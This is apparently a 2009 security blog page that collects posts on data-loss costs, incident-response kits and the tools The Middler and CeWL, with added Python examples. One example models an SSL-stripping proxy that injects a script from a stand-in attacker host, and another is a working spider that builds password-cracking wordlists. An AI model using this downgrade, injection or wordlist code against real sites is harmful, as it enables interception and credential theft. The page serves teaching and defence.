1 Trillion in Losses for 2008 - McAfee


McAfee:

California computer security firm McAfee presented the findings Thursday at the World Economic Forum in Davos, Switzerland, with a warning that the world's dismal financial straits are exacerbating data theft woes.

"Based on the survey findings, McAfee conservatively estimates the global damage from data loss to top one trillion dollars," said McAfee chief executive Dave DeWalt.



A few months ago I did an interview article about the current economic state and how it would affect InfoSec. Now I am poised to revisit that sentiment.

I would really like to be angry at CEOs and companies for not giving enough to their IT staff to properly secure systems, but I really can't. A few weeks ago I saw many friends lose their jobs: hard workers and diligent people. The economy sucks right now, and it doesn't matter whether you agree that we're in a recession or not; big business believes it.

With a decree from McAfee like this, I hope C-level executives start revisiting InfoSec priorities. They need to see where their policy rubber doesn't hit the road, so to speak. Want specifics? OK, here are some just off the top of my head.

- We need to revise policy. Even if stringent policy isn't your business's style, get someone to draft policy that fits your corporate culture and still secures your entity.

- Adequate attention needs to be given to client side attacks.

- We need to prioritize the awareness of web application vulnerabilities.

- We need to stop preaching defense in depth, and start doing it.

- We need secure code review in our release cycles.

- We need more application whitelisting on our desktops.

- We need to review our wireless policies.

- We need more database security and input validation or filtering.

- We need user awareness training, compliance testing, auditing, and pentesting.

Let's hope the reality of losing more than our current stimulus package can wake a few people up.

BT4 Released!



You can get the ISO here (md5sum and sha512sum).

And the VMware image here (md5sum and sha512sum).

We are trying to get estimates of downloads. If you link to our ISOs, please use:

http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-iso
http://www.remote-exploit.org/cgi-bin/fileget?version=bt4-beta-vm

and do not link them directly.

Release information will shortly be available on the Remote Exploit Web site.


Incident Handling Resources


Over at Ethicalhacker.net I was asked to think up a good stepping stone and give some resources for an IH/IR program. Here's what I came up with:

I would create an internal document for each sysadmin with spots for the systems they administer, a description of those systems, a business risk rating (are they critical?), IP/system info, physical location, and a blank lined section for credentials and signatures.

Hand one out to each sysadmin, have them fill it out, then take it to your company's C-level executive who is the chief data owner. Have the admin write down the credentials and sign it, then have the CEO/CIO sign it and lock it away in a binder with a copy of your IR policy (once you draft it), an up-to-date physical topology, toolkit/checklist, host inventory (including roaming laptops), etc. That binder now holds every privileged credential you have, so it belongs in a safe with controlled, logged access, not in a desk drawer. I would also run a data integrity program on those systems periodically for comparison (à la Tripwire, etc.), so that when an incident hits you have a known-good baseline to diff against.
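To make the "data integrity program for comparison" concrete, here is a minimal Tripwire-style baseline-and-diff in Python. It is an added example written for this page, not Tripwire's code or anything from the original post; the directory tree it scans and the "intrusion" it simulates are constructed inside a temporary directory, so it runs offline. It hashes every regular file under a root (skipping symlinks, so a link cannot be pointed at an already-trusted file), stores size, permission bits and SHA-256, and reports files that were added, removed or changed between two scans.

```python
import hashlib
import json
import tempfile
from pathlib import Path


def hash_file(path, chunk_size=65536):
    """SHA-256 of a file, streamed so large binaries are not read into memory at once."""
    digest = hashlib.sha256()
    with open(path, "rb") as f:
        for block in iter(lambda: f.read(chunk_size), b""):
            digest.update(block)
    return digest.hexdigest()


def build_baseline(root):
    """Record {relative path: {size, mode, sha256}} for every regular file under root.

    Symlinks are skipped so an attacker cannot point a link at a file we already trust.
    """
    root = Path(root)
    baseline = {}
    for p in sorted(root.rglob("*")):
        if p.is_file() and not p.is_symlink():
            st = p.stat()
            baseline[p.relative_to(root).as_posix()] = {
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),
                "sha256": hash_file(p),
            }
    return baseline


def save_baseline(baseline, path):
    """Write the baseline out. Keep this copy OFF the monitored host (e.g. on media
    in the IR binder); a baseline stored on the box can be edited along with the files."""
    Path(path).write_text(json.dumps(baseline, indent=2, sort_keys=True))


def load_baseline(path):
    return json.loads(Path(path).read_text())


def compare(baseline, current):
    """Diff two scans: files added, removed, or changed in content, size or permissions."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current) if baseline[p] != current[p])
    return {"added": added, "removed": removed, "modified": modified}


def demo():
    """Constructed walk-through: baseline a scratch tree, tamper with it, diff the two."""
    with tempfile.TemporaryDirectory() as d, tempfile.TemporaryDirectory() as store:
        root = Path(d)
        (root / "etc").mkdir()
        (root / "bin").mkdir()
        (root / "etc" / "passwd").write_text("root:x:0:0:root:/root:/bin/sh\n")
        (root / "bin" / "ls").write_bytes(b"\x7fELF-original")  # stand-in for a real binary
        store_file = Path(store) / "baseline.json"
        save_baseline(build_baseline(root), store_file)

        # Simulated intrusion (constructed): a same-size trojaned binary, which a size
        # check alone would miss; a new file dropped in bin; a deleted config file.
        (root / "bin" / "ls").write_bytes(b"\x7fELF-trojan!!")
        (root / "bin" / "sh.bak").write_bytes(b"constructed backdoor payload")
        (root / "etc" / "passwd").unlink()

        return compare(load_baseline(store_file), build_baseline(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

Run on a real host this is only as trustworthy as the binaries that do the scanning and the place the baseline lives: scan from the statically linked tools or bootable CD in the jump kit, and keep the saved baseline off the machine, or an intruder simply rewrites both.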

Neohapsis has some good ideas for an IH kit (from SANS 504) archived here:

http://archives.neohapsis.com/archives/fulldisclosure/2003-q3/1579.html

* Use a duffel bag and keep it permanently stocked.
* Never steal from your own bag.
* Hardware:
  * Blank, unused (or at least wiped) SCSI disk.
  * Blank, unused (or at least wiped) IDE disk.
  * Small 8-port hub (NOT A SWITCH!). Get a really old one with AUI & coax.
  * Cat5, cross-over Cat5, AUI, coax cables.
  * Laptop, dual OS. Use whatever OSs are best for your situation.
  * Tx-neutered Cat5 (snip one wire; it's receive-only!)
  * PCMCIA WiFi card.
  * USB thumb drive.
  * Serial cable w/ Cisco router connection.
  * Flashlight.
  * Screwdrivers (but TSA might confiscate them -- you might have to buy new ones each trip).
  * Female-to-female RJ45.
  * Tape recorder, MiniDisc, or equivalent.
  * Camera (depending upon your requirements: digital, 35mm, or Polaroid, in that order of legal admissibility).
  * Video camera, if your plan includes one. Consider the pitfalls of too much info.
* Software:
  * Copying software: dd, windd, Ghost, etc.
  * Sniffer software: Ethereal, etc.
  * Forensic software: The Coroner's Toolkit, etc.
  * Statically linked binaries: ls, ps, etc.
  * Bootable OS on floppy or CD.
  * Windows Resource Kit.
* Supplies:
  * Lots of media for the tape recorder.
  * Lots of new, unused backup media (floppies, tapes, CD-R, etc.)
  * Team phone list & company phone book.
  * Cell phone & LOTS of batteries (say, 3 or 4).
  * Plastic baggies with ties for evidence.
  * Extra notebooks (bound, with numbered pages).
  * Extra copies of all of your forms.
  * Pens (not pencils!)
  * Business cards.

You should also consider budget for a "War Room", a windowless office (or closet) that you can meet in, tape evidence up on the wall, etc. It has to have comm (net, phone, fax), TV/VCR, paper, whiteboards, etc.

You also need a slush fund. You need to be able to spend money instantly during an incident. If you need to cut a PO at 3:00 AM to get an extra SCSI drive, or some extra baggies, you are screwed. If you need to consult the corporate travel adviser before you fly to the location of an incident, you are screwed.


The official SANS site has this good outline:

http://www.giac.org/resources/whitepaper/network/17.php

and this section of IR whitepapers:

http://www.sans.org/reading_room/whitepapers/incident/

Read the ISC Handler's Diary every day!

http://isc.sans.org/diaryarchive.html

Additional Links:

Security Incident Survey Cheat Sheet for Server Administrators

http://www.zeltser.com/network-os-security/security-incident-survey-cheat-sheet.html

Initial Security Incident Questionnaire for Responders

http://www.zeltser.com/network-os-security/security-incident-questionnaire-cheat-sheet.html

Network DDoS Incident Response Cheat Sheet

http://www.zeltser.com/network-os-security/ddos-incident-cheat-sheet.html

Reverse-Engineering Cheat Sheet

http://www.zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

My OPML file

This is my OPML file. It's a collection of everything infosec I have liked for the past year: blogs, AV reports, security news, vuln reports. You name it, you'll probably find it in here.

Big names and small names alike, tools, policy, industry, etc. Over 500 RSS links. I read about 25% of it daily, which means I'm always behind, but it still keeps me up to date =)

It includes the Security Bloggers Network, my own feeds, and some good friends' conglomerated links.

Feel free to check through it, edit, trim, critique, but especially add and read.

Hope it helps someone!

http://wiki.securityaegis.com/Home/opml-file

Ethicalhacker.net

Hey everyone,

If you don't already, go check out Ethicalhacker.net.

The reason I say this is that they have a really great community for admins, infosec, and IT all around. The forums, the exclusive articles, and the webcasts they host are spectacular. I post a lot around there these days, and I'll have a review of the Nmap Secrets CBT there soon too.

Not only that, but the InGuardians team posts their monthly challenges there! Go decode some traffic, show off your incident handler skills, and win a prize!

-JH out

The Middler - RELEASED



Jay Beale (creator of Bastille Linux) will be releasing "The Middler" after his talk at ShmooCon.

Many of you will remember he announced it at DEF CON 16, but the tool was barely at an alpha stage then; he has now completed the alpha.

Here ya go:

http://inguardians.com/tools/middler-alpha.tgz

Listen to the Defcon Audio on it here:

http://good.net/dl/bd/defcon-16-audio/08_dc_t412.mp3/info

And get the slides here:

http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-beale-2.pdf


Jay Beale, Senior Security Consultant and Co-Founder, Intelguardians Network Intelligence, Inc. This talk introduces a new open source, plugin-extensible attack tool for exploiting web applications that use cleartext HTTP, if only to redirect the user to the HTTPS site. We'll demonstrate attacks on online banking as well as Gmail, LinkedIn, LiveJournal and Facebook. We'll also compromise computers and an iPhone by subverting their software installation and update process. We'll inject Javascript into browser sessions and demonstrate CSRF attacks.

Our new tool, The Middler, automates these attacks to make exploiting every active user on your computer's network brain-dead easy and scalable. It has an interactive mode, but also has a fire-and-forget mode that can perform these attacks automatically without interaction. Written in Ruby, this tool is easy to both extend and add into other tools.
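The attack in the abstract rests on one observation: a site that is reachable over cleartext HTTP, even if it only answers with a redirect to HTTPS, gives an active attacker on the victim's network a chance to rewrite that redirect and keep the victim on cleartext for the rest of the session, while the attacker's proxy speaks HTTPS to the real site. The following Python is an added model of that two-sided proxy logic, written for this page; it is not code from The Middler (which is Ruby) or from Jay Beale. The server response, the hosts bank.example and attacker.example, and the injected script URL are all constructed.

```python
import re

# Constructed response as the attacker's proxy sees it coming back from the real
# server: a cleartext page whose only job is to bounce the user to HTTPS.
CONSTRUCTED_RESPONSE = (
    "HTTP/1.1 302 Found\r\n"
    "Location: https://bank.example/login\r\n"
    "Content-Type: text/html\r\n"
    "\r\n"
    '<html><body>Redirecting... <a href="https://bank.example/login">Log in</a></body></html>'
)

# Hypothetical attacker-controlled script tag; the hostname is an assumption.
INJECTED_SCRIPT = '<script src="http://attacker.example/hook.js"></script>'

URL_RE = re.compile(r"https://([^\s\"'<>]+)")


def parse_response(raw):
    """Split a raw HTTP response into status line, header pairs and body."""
    head, _, body = raw.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    headers = [tuple(line.split(": ", 1)) for line in header_lines]
    return status_line, headers, body


def downgrade(raw, strip_map):
    """Victim-facing half of the MITM: every https:// reference becomes http://.

    strip_map remembers the original https:// URL for each stripped one, so the
    proxy can re-upgrade the victim's later requests on the server-facing side.
    """
    status_line, headers, body = parse_response(raw)

    def strip(url):
        stripped = "http://" + url[len("https://"):]
        strip_map[stripped] = url
        return stripped

    new_headers = []
    for name, value in headers:
        if name.lower() == "location" and value.startswith("https://"):
            value = strip(value)  # the redirect to HTTPS never reaches the browser
        new_headers.append((name, value))

    body = URL_RE.sub(lambda m: strip(m.group(0)), body)
    if "</body>" in body:  # the abstract's JavaScript injection, modelled crudely
        body = body.replace("</body>", INJECTED_SCRIPT + "</body>", 1)
    return status_line, new_headers, body


def upgrade_request(url, strip_map):
    """Server-facing half: the proxy talks HTTPS to the real site, so the server
    sees a normal TLS session; only the victim's leg of the path is cleartext."""
    return strip_map.get(url, url)


def rebuild(status_line, headers, body):
    """Serialize the rewritten response for delivery to the victim."""
    return status_line + "\r\n" + "".join(f"{n}: {v}\r\n" for n, v in headers) + "\r\n" + body


if __name__ == "__main__":
    mapping = {}
    print(rebuild(*downgrade(CONSTRUCTED_RESPONSE, mapping)))
    print(mapping)
```

Two things follow from the model. First, the real server sees nothing wrong: the TLS session it terminates belongs to the attacker, so server-side logs will not show the downgrade, and detection has to happen on the victim's network segment (ARP or DHCP anomalies, an unexpected gateway) or in the user's own eyes (no padlock). Second, the vulnerable piece is the cleartext redirect itself; a site that is never reachable on port 80 at all gives the proxy nothing to rewrite, and users who reach the login page by typing or bookmarking the https:// URL directly never send the cleartext request the attack needs.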

phpBB Hacked via Third-Party Script Vuln



Saw this on Security Circus, very sad indeed:

http://hackedphpbb.blogspot.com/

CeWL for Penetration Testers


From the blog of Seth Misenar

CeWL for Pen Testers

Shortly after flipping through Ed’s slide deck for Secrets of America’s Top Pen Testers yesterday, I noticed a fortuitous tool announcement come across the SANS GIAC Alumni mailing list. Robin Wood emailed to announce the release of a tool called CeWL: Custom Wordlist Generator (which is of course pronounced ‘cool’).

http://www.digininja.org/cewl.php

CeWL “spiders a given url to a specified depth, optionally following external links, and returns a list of words which can then be used for password crackers such as John the Ripper” (from the website).

Very nice. This tool dovetails nicely with Ed’s first tip from SATPT, “Build Password Guessing and Cracking Dictionaries”. In fact, it turns out that the tool was based on a PaulDotCom discussion, http://pauldotcom.com/2008/11/creating-custom-wordlists-for.html, which was in turn based upon content provided in Ed’s SEC560: Network Penetration Testing, which I will be teaching in Atlanta in February, https://www.sans.org/atlanta09_cs/description.php?tid=1717.

Whew... did you follow all that? Regardless of its origins, CeWL definitely looks like something I will be adding to my tool arsenal. Check it out.
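To show what "spiders a given URL to a specified depth, optionally following external links, and returns a list of words" actually involves, here is a small custom-wordlist generator in Python. It is an added example for this page, not CeWL's code (CeWL is written in Ruby) and not from Seth's or Robin's posts. The target site is a constructed in-memory dictionary of pages served by a `fetch` stand-in, so nothing touches the network; the hostnames target.example and external.example are assumptions. It extracts visible text only (script and style contents are skipped, since variable names make poor password candidates), stays on the starting host unless told otherwise, and orders the result by frequency, which is the order a cracker should try.

```python
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed pages standing in for a target's website.
SITE = {
    "http://target.example/": """<html><head><title>Acme Widgets</title>
      <script>var tracking = "ignore_me";</script></head>
      <body><h1>Acme Widgets</h1>
      <p>Welcome to Acme, makers of the WidgetPro 3000 and Widgetmaster.</p>
      <a href="/about">About</a> <a href="http://external.example/">Partner</a>
      </body></html>""",
    "http://target.example/about": """<html><body><p>Founded in Springfield by Jane Widgetson.
      Our mascot is Sparky.</p><a href="/">Home</a></body></html>""",
    "http://external.example/": "<html><body><p>Partner site words</p></body></html>",
}


class TextAndLinks(HTMLParser):
    """Collect visible text and hrefs; skip everything inside script/style."""

    def __init__(self):
        super().__init__()
        self.text, self.links, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "style"):
            self._skip += 1
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    self.links.append(value)

    def handle_endtag(self, tag):
        if tag in ("script", "style") and self._skip:
            self._skip -= 1

    def handle_data(self, data):
        if not self._skip:
            self.text.append(data)


def fetch(url):
    """Stand-in for an HTTP GET, answering only from the constructed SITE."""
    return SITE.get(url)


def spider_words(start, depth=2, min_len=3, offsite=False, fetch=fetch):
    """Breadth-first crawl from start, counting words of at least min_len characters.

    depth is the number of link hops allowed from the start page; offsite=False keeps
    the crawl on the starting host, which is also what keeps it inside scope.
    """
    start_host = urlsplit(start).netloc
    seen, counts = set(), Counter()
    frontier = [(start, 0)]
    while frontier:
        url, hops = frontier.pop(0)
        if url in seen or hops > depth:
            continue
        seen.add(url)
        page = fetch(url)
        if page is None:
            continue
        parser = TextAndLinks()
        parser.feed(page)
        for word in re.findall(r"[A-Za-z0-9]+", " ".join(parser.text)):
            if len(word) >= min_len:
                counts[word] += 1
        for href in parser.links:
            nxt = urljoin(url, href)
            if offsite or urlsplit(nxt).netloc == start_host:
                frontier.append((nxt, hops + 1))
    return counts


def wordlist(counts):
    """Most frequent first, ties alphabetically; feed this to John the Ripper."""
    return [w for w, _ in sorted(counts.items(), key=lambda kv: (-kv[1], kv[0]))]


if __name__ == "__main__":
    print("\n".join(wordlist(spider_words("http://target.example/"))))
```

A real run replaces `fetch` with an HTTP client and adds the case and suffix mangling (Acme2008, acme!, WidgetPro1) that John's rules provide; keep the depth small and offsite following off unless the external hosts are in scope, because the crawl is active traffic against the target.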